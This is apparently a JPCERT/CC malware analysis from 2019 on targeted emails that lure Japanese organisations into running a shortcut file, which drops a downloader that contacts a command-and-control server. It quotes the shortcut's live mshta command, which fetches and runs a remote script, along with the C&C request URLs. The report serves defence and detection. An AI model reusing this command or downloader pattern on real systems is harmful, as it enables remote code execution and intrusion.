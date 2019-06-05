Beginning in April 2019, JPCERT/CC has been observing attacks where targeted emails are distributed to Japanese organisations, aiming to convince recipients to download a malicious shortcut file. These emails contain a link to a shortcut file on a cloud service. When this shortcut file is executed, a downloader launches.

This article is to describe the details of the downloader and the behaviour that follows.

How the downloader is launched

The following chart shows the flow of event from the shortcut file being launched until the downloader infects a host.

Fig 1: Flow of events from running the shortcut file to infecting a host

The shortcut files that JPCERT/CC has analysed contained the following code which downloads an HTML file (Fig 2) including VBScript. This VBScript creates and executes a VBS file (stwa.vbs) and a BAT file (Autorun.bat).

/c start /MIN %windir%\system32\mshta.exe http://pact.vgmtx.com/58l1hq/76pcik.php &ping 127.0.0.1&taskkill /f /im mshta.exe&%tmp%\Autorun.bat

Fig 2: HTML file downloaded by the shortcut file

When executed, stwa.vbs decodes the Base64-encoded data in the shortcut file (Fig 3) and saves it as a Windows executable file (stwa.exe) and a dummy Word file to display.

Fig 3: Base64-encoded data in the shortcut file

stwa.exe is in self-extract format (CAB) and creates a set of files (Table 1) when executed. Out of those, srdfqm.exe is the downloader that performs the main functions including communication.

Table 1: Files created by stwa.exe

File name Details srdfqm.exe Downloader cp_cdis32.exe Save srdfqm.exe in %APPDATA%\Microsoft\ sd.exe Add winpt.xml and winpt_n.xml to windows task winpt.xml Task XML file* winpt_n.xml Task XML file*

*Please refer to Appendix B for tasks that are registered.

Srdfqm.exe

This malware simply serves as a downloader. It performs the following communication with a C&C server when executed. The first request asks for the name of the file to download.

GET /XwuM6u/edgeside.php Host: monday.reuqest-userauth.com Accept-Encoding: identity

The second outbound communication contains the file name which is obtained as a response to the first request. A file will be downloaded from the C&C server and saved to the device.

http://monday.reuqest-userauth.com/XwuM6u/jf80/[file name]

If the download is successful, the following will be sent as the third communication:

http://monday.reuqest-userauth.com/XwuM6u/around.php

This malware is assumed to be build based on the following code:

http://scumways.com/happyhttp/happyhttp.html

So far, we have not been able to identify what kind of sample this malware downloads as a result of the above communication.

In closing

Although shortcut files are often used as an entry point of an attack in many cases, adversaries have been changing the actual attack techniques around it. We assume that similar targeted attacks are likely to continue.

Tasks that are created by the samples are listed in Appendix B. Also, a list of C&C servers that we confirmed is available in Appendix D. Please make sure that none of your devices is accessing these hosts.

Thank you for reading.

Shusei Tomonaga, Wataru Takahashi

(Translated by Yukako Uchida)

Appendix A: Shortcut file information

Table 2: Data contained in the shortcut file

Item Contents Drive serial number d0e3-15e3 NetBIOS name win-j1m3n7bfrbl MAC address 00:0c:29:81:1b:f9

Appendix B: Registered Tasks

Table 3: Registered Task 1

Item Contents Name WinPcapUpdt Auther MSS_Local Program %APPDATA%\Microsoft\srdfqm.exe

Table 4: Registered Task 2

Item Contents Name WinPcapUpdt_n Auther MSS_Local_PR Program %APPDATA%\Microsoft\Network\lqm_gt.exe

Appendix C: SHA-256 Hash Value of the sample

cd431575e46b80237e84cc38d3b0bc6dcd676735c889539b5efa06cec22f0560

128f1af38e8e6075884e32c479b3fc984b80b774cea5a5c55b1a8929ae16694c

26a01df4f26ed286dbb064ef5e06ac7738f5330f6d60078c895d49e705f99394

c232be4661e6ba1c1823f3406896d1e53ac9697943b19b14de50e45e600d4243

284210262b353d8e80d708c008a17e79c61311098e3d089f8a37756c206933ea

fb8b220920281d8e7e12c4d76839fd07737eb3008af793a69c496f061d98326d

bf45cecd4368c7c9320804cdda5fd660e2485957178361995eaa4adddf12dcd9

94714816aaa2a1a4390e5b613936bb0849de79c3ffdec2cd03c2cd55029a22cd

b2c9b31a305c1ce0c316a6896a558d51094349397fff9dad886c13d935f7a2eb

ed50f748066ef6c317e4ce48aab9d338c139aa3f707f69b239b75af120f49de1

45104b0efd653e1c928deaae952882b80dbb044a6a11f5972a1b326a4d3d4551

40b43d752f8dc1a10df4abceb7a18062a0072b9dc0834f33d32ab60a0cf8b075

ab2273b019f7a2dda764e1de760753364924f9efd4107ee613d89054a3292991

b9c476f8a0bf2d334f05f8b4831ca528adfdafaceb72fa8be5cfe78086409dd5

fac968a2b1736502c96872f4996194d580102a7312c4e8efac8caf3003c630bf

b7f9997b2dd97086343aa21769a60fb1d6fbf2d5cc6386ee11f6c52e6a1a780c

Appendix D: List of C&C servers